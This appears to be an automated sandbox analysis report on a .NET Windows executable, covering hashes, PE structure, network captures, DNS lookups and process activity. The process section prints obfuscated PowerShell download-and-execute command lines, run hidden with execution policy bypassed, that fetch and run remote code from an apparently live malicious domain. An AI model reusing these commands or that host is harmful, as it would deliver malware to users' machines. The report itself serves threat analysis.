                                  Preview:...................................FL..................F.".. ...]...z...:....c..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z........c..&.%..c......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V*Z............................B...A.p.p.D.a.t.a...B.V.1.....*Z....Roaming.@......EW.V*Z............................Iy?.R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.V*Z................................M.i.c.r.o.s.o.f.t.....V.1.....EW&Y..Windows.@......EW.V*Z................................W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.V*Z......................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.V*Z......................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VEW.V..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.V*Z..................
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6221
                                  Entropy (8bit):3.723576800718107
                                  Encrypted:false
                                  SSDEEP:48:ZVCfZCl3CvU2EZVjwukvhkvklCywflYF/l+ASogZopFFYF/l+ASogZoP1:H2CNCsNZVdkvhkvCCtNYF/IHaYF/IHM
                                  MD5:AF3174EEDE10F28E5C8A0F3A46C47192
                                  SHA1:9C5B4669F507C74D47C183C167936640C97101E4
                                  SHA-256:C962CA84FEB13C52394ACC1DBF93FD146BF4329467C823263553094DD0922372
                                  SHA-512:C1BFAA2E0E51CCD9E0435193DAA476A2098AD4C6E590A7CE5159DB7618ACAF9A26618D9654049DA4C2BAF199C528B1CFE95489BF240494FF4FB4754145250715
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...]...z...:....c..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z........c......c......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V*Z............................B...A.p.p.D.a.t.a...B.V.1.....*Z....Roaming.@......EW.V*Z............................Iy?.R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.V*Z................................M.i.c.r.o.s.o.f.t.....V.1.....EW&Y..Windows.@......EW.V*Z................................W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.V*Z......................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.V*Z......................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.V*Z............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.V*Z..................
                                  File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):4.96040409245987
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  File name:87J30ulb4q.exe
                                  File size:23'040 bytes
                                  MD5:f60ca825aa99f293f45fd16610d64a45
                                  SHA1:2661b9d7a7801b1aa997ff3fc7c9d30aedbc4fa6
                                  SHA256:7c2c27aaedbc67a8e7e5c3e2e529d1a97c1b2778dbaeac037bfedaea51e0f867
                                  SHA512:e6d74668e7c3f339e7543011870ca125a47be062b591d0e02cf6d65fd28e649f916dd86bfce57be0fdb55095ab7e0e38aa1ca17db8e79426b606289a65bdfb25
                                  SSDEEP:384:whZ/ZDI4WoKct3XQ/fPy/I6RylDa4hArl16kyKjDWucxB+VuK:kI4R3GPZ6RylDa4hArlgkyKjDWuV3
                                  TLSH:25A2661469FE441AC27FEE30ADF5A5DDCAFA66532404A8BF08D503875B13B40DF82979
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..P...........n... ........@.. ....................................`................................
                                  Icon Hash:90cececece8e8eb0
                                  Entrypoint:0x406e8e
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows cui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0xDF19A82E [Tue Aug 10 18:23:42 2088 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                   Instruction
                                   jmp dword ptr [00402000h]
                                   add byte ptr [eax], al
                                   (the line above is repeated 97 times in the report: everything after the six-byte jmp stub is zero padding, and 00 00 disassembles as add byte ptr [eax], al. The jmp target 0x402000 is the IAT (RVA 0x2000 at imagebase 0x400000), whose only entry is _CorExeMain from mscoree.dll, i.e. the standard native entry stub of a 32-bit .NET assembly; the managed code begins at the CLR header referenced by IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR.)
                                   Name | Virtual Address | Virtual Size | Is in Section
                                   IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
                                   IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6e3a | 0x4f | .text
                                   IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8000 | 0x5ac | .rsrc
                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                                   IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
                                   IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa000 | 0xc | .reloc
                                   IMAGE_DIRECTORY_ENTRY_DEBUG | 0x6dac | 0x38 | .text
                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                                   IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                                   IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                   IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                                   Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                   .text | 0x2000 | 0x4e94 | 0x5000 | 69f62f86f790bc99792b5c66c4984f72 | False | 0.408349609375 | data | 5.102184080329096 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                   .rsrc | 0x8000 | 0x5ac | 0x600 | f7d435cbe99dd9e40c5075da866ed8fc | False | 0.41796875 | data | 4.083834761172241 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                   .reloc | 0xa000 | 0xc | 0x200 | 86b994bfe516ad0bc2489a5e0f94f2fa | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                   Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                   RT_VERSION | 0x8090 | 0x31c | data | - | - | 0.4321608040201005
                                   RT_MANIFEST | 0x83bc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | - | - | 0.5489795918367347
                                   DLL | Import
                                   mscoree.dll | _CorExeMain
                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                   Jan 10, 2025 22:21:42.207220078 CET | 49707 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:42.207276106 CET | 443 | 49707 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:42.207429886 CET | 49707 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:42.215361118 CET | 49707 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:42.215375900 CET | 443 | 49707 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:42.701354980 CET | 443 | 49707 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:42.701457977 CET | 49707 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:42.705156088 CET | 49707 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:42.705177069 CET | 443 | 49707 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:42.705493927 CET | 443 | 49707 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:42.754234076 CET | 49707 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:42.870836020 CET | 49707 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:42.911329985 CET | 443 | 49707 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:43.261605978 CET | 443 | 49707 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:43.261670113 CET | 443 | 49707 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:43.262036085 CET | 49707 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:43.276186943 CET | 49707 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:44.499392033 CET | 49708 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:44.499430895 CET | 443 | 49708 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:44.499537945 CET | 49708 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:44.504821062 CET | 49708 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:44.504836082 CET | 443 | 49708 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:44.965205908 CET | 443 | 49708 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:44.965275049 CET | 49708 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:44.966996908 CET | 49708 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:44.967003107 CET | 443 | 49708 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:44.967272997 CET | 443 | 49708 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:44.974056959 CET | 49708 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:45.019339085 CET | 443 | 49708 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:45.354696989 CET | 443 | 49708 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:45.354769945 CET | 443 | 49708 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:45.354814053 CET | 49708 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:45.355371952 CET | 49708 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:53.086674929 CET | 49740 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:53.086713076 CET | 443 | 49740 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:53.087140083 CET | 49740 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:53.096276045 CET | 49740 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:53.096292019 CET | 443 | 49740 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:53.554637909 CET | 443 | 49740 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:53.554711103 CET | 49740 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:53.555958986 CET | 49740 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:53.555963993 CET | 443 | 49740 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:53.556211948 CET | 443 | 49740 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:53.563035011 CET | 49740 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:53.603343010 CET | 443 | 49740 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:53.948569059 CET | 443 | 49740 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:53.948632002 CET | 443 | 49740 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:21:53.948945045 CET | 49740 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:21:53.995851994 CET | 49740 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:22:00.600729942 CET | 49788 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:22:00.600773096 CET | 443 | 49788 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:22:00.600852966 CET | 49788 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:22:00.603444099 CET | 49788 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:22:00.603456020 CET | 443 | 49788 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:22:01.114072084 CET | 443 | 49788 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:22:01.114137888 CET | 49788 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:22:01.118146896 CET | 49788 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:22:01.118169069 CET | 443 | 49788 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:22:01.118535995 CET | 443 | 49788 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:22:01.128258944 CET | 49788 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:22:01.171346903 CET | 443 | 49788 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:22:01.525507927 CET | 443 | 49788 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:22:01.525674105 CET | 443 | 49788 | 104.21.96.1 | 192.168.2.11
                                   Jan 10, 2025 22:22:01.525929928 CET | 49788 | 443 | 192.168.2.11 | 104.21.96.1
                                   Jan 10, 2025 22:22:01.526577950 CET | 49788 | 443 | 192.168.2.11 | 104.21.96.1
                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                   Jan 10, 2025 22:21:42.186670065 CET | 51060 | 53 | 192.168.2.11 | 1.1.1.1
                                   Jan 10, 2025 22:21:42.201565981 CET | 53 | 51060 | 1.1.1.1 | 192.168.2.11
                                   Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                   Jan 10, 2025 22:21:42.186670065 CET | 192.168.2.11 | 1.1.1.1 | 0x78e1 | Standard query (0) | zjhy.coimbratratadores.com | A (IP address) | IN (0x0001) | false
                                   Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                   Jan 10, 2025 22:21:42.201565981 CET | 1.1.1.1 | 192.168.2.11 | 0x78e1 | No error (0) | zjhy.coimbratratadores.com | - | 104.21.96.1 | A (IP address) | IN (0x0001) | false
                                   Jan 10, 2025 22:21:42.201565981 CET | 1.1.1.1 | 192.168.2.11 | 0x78e1 | No error (0) | zjhy.coimbratratadores.com | - | 104.21.48.1 | A (IP address) | IN (0x0001) | false
                                   Jan 10, 2025 22:21:42.201565981 CET | 1.1.1.1 | 192.168.2.11 | 0x78e1 | No error (0) | zjhy.coimbratratadores.com | - | 104.21.112.1 | A (IP address) | IN (0x0001) | false
                                   Jan 10, 2025 22:21:42.201565981 CET | 1.1.1.1 | 192.168.2.11 | 0x78e1 | No error (0) | zjhy.coimbratratadores.com | - | 104.21.32.1 | A (IP address) | IN (0x0001) | false
                                   Jan 10, 2025 22:21:42.201565981 CET | 1.1.1.1 | 192.168.2.11 | 0x78e1 | No error (0) | zjhy.coimbratratadores.com | - | 104.21.64.1 | A (IP address) | IN (0x0001) | false
                                   Jan 10, 2025 22:21:42.201565981 CET | 1.1.1.1 | 192.168.2.11 | 0x78e1 | No error (0) | zjhy.coimbratratadores.com | - | 104.21.80.1 | A (IP address) | IN (0x0001) | false
                                   Jan 10, 2025 22:21:42.201565981 CET | 1.1.1.1 | 192.168.2.11 | 0x78e1 | No error (0) | zjhy.coimbratratadores.com | - | 104.21.16.1 | A (IP address) | IN (0x0001) | false
                                  • zjhy.coimbratratadores.com
                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   0 | 192.168.2.11 | 49707 | 104.21.96.1 | 443 | 5708 | C:\Users\user\Desktop\87J30ulb4q.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   2025-01-10 21:21:42 UTC | 168 | OUT | GET /gyofchhr/?l=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRgM3dvRmbpdFfpRHdvRHfwkDM1AzM HTTP/1.1
                                  Host: zjhy.coimbratratadores.com
                                  Connection: Keep-Alive
                                   2025-01-10 21:21:43 UTC | 1094 | IN | HTTP/1.1 401 Unauthorized
                                  Date: Fri, 10 Jan 2025 21:21:43 GMT
                                  Content-Length: 0
                                  Connection: close
                                  Cache-Control: no-store
                                  X-Robots-Tag: noindex, nofollow
                                  X-Frame-Options: DENY
                                  X-Content-Type-Options: nosniff
                                  Referrer-Policy: no-referrer
                                  Feature-Policy: camera 'none'; microphone 'none'
                                  Permissions-Policy: camera=(), microphone=()
                                  Cross-Origin-Opener-Policy: same-origin
                                  Cross-Origin-Resource-Policy: same-site
                                  cf-cache-status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tLNyB%2BbT3lALIPdADUMaVTvHRAYsJ6I2LSIVYh8E0aouA52rVZsVroRDC%2BrsLXKrLge%2F82yWyTCTYpKXb29akQD%2FYsONgDOtfaFs%2FFx%2BdL0qOmLG9poyrE1EB4GBSEuIHUPKcKqWF3ntPVCLGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8fffb7e349e14363-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1556&rtt_var=613&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2857&recv_bytes=782&delivery_rate=1876606&cwnd=240&unsent_bytes=0&cid=e35d7c11d6ccbcd1&ts=576&x=0"


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   1 | 192.168.2.11 | 49708 | 104.21.96.1 | 443 | 7224 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   2025-01-10 21:21:44 UTC | 90 | OUT | GET /jkqjcpxpnhtgxr HTTP/1.1
                                  Host: zjhy.coimbratratadores.com
                                  Connection: Keep-Alive
                                   2025-01-10 21:21:45 UTC | 1088 | IN | HTTP/1.1 401 Unauthorized
                                  Date: Fri, 10 Jan 2025 21:21:45 GMT
                                  Content-Length: 0
                                  Connection: close
                                  Cache-Control: no-store
                                  X-Robots-Tag: noindex, nofollow
                                  X-Frame-Options: DENY
                                  X-Content-Type-Options: nosniff
                                  Referrer-Policy: no-referrer
                                  Feature-Policy: camera 'none'; microphone 'none'
                                  Permissions-Policy: camera=(), microphone=()
                                  Cross-Origin-Opener-Policy: same-origin
                                  Cross-Origin-Resource-Policy: same-site
                                  cf-cache-status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BgVbo3xOcLmYxAby3LtcRUCURWio%2BjkacKsbhF4voDQn6wNmoXjpC94%2FIrgeMqvcB6WUZTxF2UBWsjwlCYrWEtlkZ6rSOSRrMlbmF4PNNa%2FYmQbXOaLEd7qNsdbrcTOgCMDLZIUrWi747IvFKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8fffb7f09b6172a4-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1954&min_rtt=1948&rtt_var=743&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1460000&cwnd=212&unsent_bytes=0&cid=2037fa58cc0a617b&ts=399&x=0"


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   2 | 192.168.2.11 | 49740 | 104.21.96.1 | 443 | 7452 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   2025-01-10 21:21:53 UTC | 90 | OUT | GET /ukbhsxzcjwqypk HTTP/1.1
                                  Host: zjhy.coimbratratadores.com
                                  Connection: Keep-Alive
                                   2025-01-10 21:21:53 UTC | 1088 | IN | HTTP/1.1 401 Unauthorized
                                  Date: Fri, 10 Jan 2025 21:21:53 GMT
                                  Content-Length: 0
                                  Connection: close
                                  Cache-Control: no-store
                                  X-Robots-Tag: noindex, nofollow
                                  X-Frame-Options: DENY
                                  X-Content-Type-Options: nosniff
                                  Referrer-Policy: no-referrer
                                  Feature-Policy: camera 'none'; microphone 'none'
                                  Permissions-Policy: camera=(), microphone=()
                                  Cross-Origin-Opener-Policy: same-origin
                                  Cross-Origin-Resource-Policy: same-site
                                  cf-cache-status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LEkfEJ1BgfZxNjiSDrjNylPWXOAvMF6FMR09CGolng8YglYoQbdD5zxVjNZAOIEODN63JWn4BmHP06wCifXQ%2Ftk%2F6mjL2Tmy62R88Op%2FY5kn0aa8IhfXI3rzFpL8IIPhiT6DtC5V46qFyoGY5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8fffb8262bbdc32e-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1587&rtt_var=599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2856&recv_bytes=704&delivery_rate=1820448&cwnd=178&unsent_bytes=0&cid=018c6c1059f19cd1&ts=402&x=0"


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   3 | 192.168.2.11 | 49788 | 104.21.96.1 | 443 | 7684 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   2025-01-10 21:22:01 UTC | 90 | OUT | GET /ukbhsxzcjwqypk HTTP/1.1
                                  Host: zjhy.coimbratratadores.com
                                  Connection: Keep-Alive
                                   2025-01-10 21:22:01 UTC | 1088 | IN | HTTP/1.1 401 Unauthorized
                                  Date: Fri, 10 Jan 2025 21:22:01 GMT
                                  Content-Length: 0
                                  Connection: close
                                  Cache-Control: no-store
                                  X-Robots-Tag: noindex, nofollow
                                  X-Frame-Options: DENY
                                  X-Content-Type-Options: nosniff
                                  Referrer-Policy: no-referrer
                                  Feature-Policy: camera 'none'; microphone 'none'
                                  Permissions-Policy: camera=(), microphone=()
                                  Cross-Origin-Opener-Policy: same-origin
                                  Cross-Origin-Resource-Policy: same-site
                                  cf-cache-status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=09SXW54vHSlVirhjOzPEEZRyPV6gnSTKhCKOa3CGTHvg0DTtxLgXcJvjnN4QJUY7TTzQl%2BaSJssNl4Y0P2%2B6jGCQdzAA1gGjzd90CJp2dXbtOfblyvePAtoniXm8kc3CB8gsqP0C%2BKTeWE3KwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8fffb8557e5d1a48-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=2386&min_rtt=2095&rtt_var=1368&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2856&recv_bytes=704&delivery_rate=659588&cwnd=157&unsent_bytes=0&cid=7b7a98bdb4fb956f&ts=425&x=0"


                                  Target ID:0
                                  Start time:16:21:40
                                  Start date:10/01/2025
                                  Path:C:\Users\user\Desktop\87J30ulb4q.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\87J30ulb4q.exe"
                                  Imagebase:0x430000
                                  File size:23'040 bytes
                                  MD5 hash:F60CA825AA99F293F45FD16610D64A45
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:1
                                  Start time:16:21:40
                                  Start date:10/01/2025
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff68cce0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:8
                                  Start time:16:21:42
                                  Start date:10/01/2025
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)"
                                  Imagebase:0xe10000
                                  File size:433'152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:9
                                  Start time:16:21:49
                                  Start date:10/01/2025
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)"
                                  Imagebase:0x7ff6eb350000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:10
                                  Start time:16:21:49
                                  Start date:10/01/2025
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff68cce0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:12
                                  Start time:16:21:57
                                  Start date:10/01/2025
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)"
                                  Imagebase:0x7ff6eb350000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:13
                                  Start time:16:21:57
                                  Start date:10/01/2025
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff68cce0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
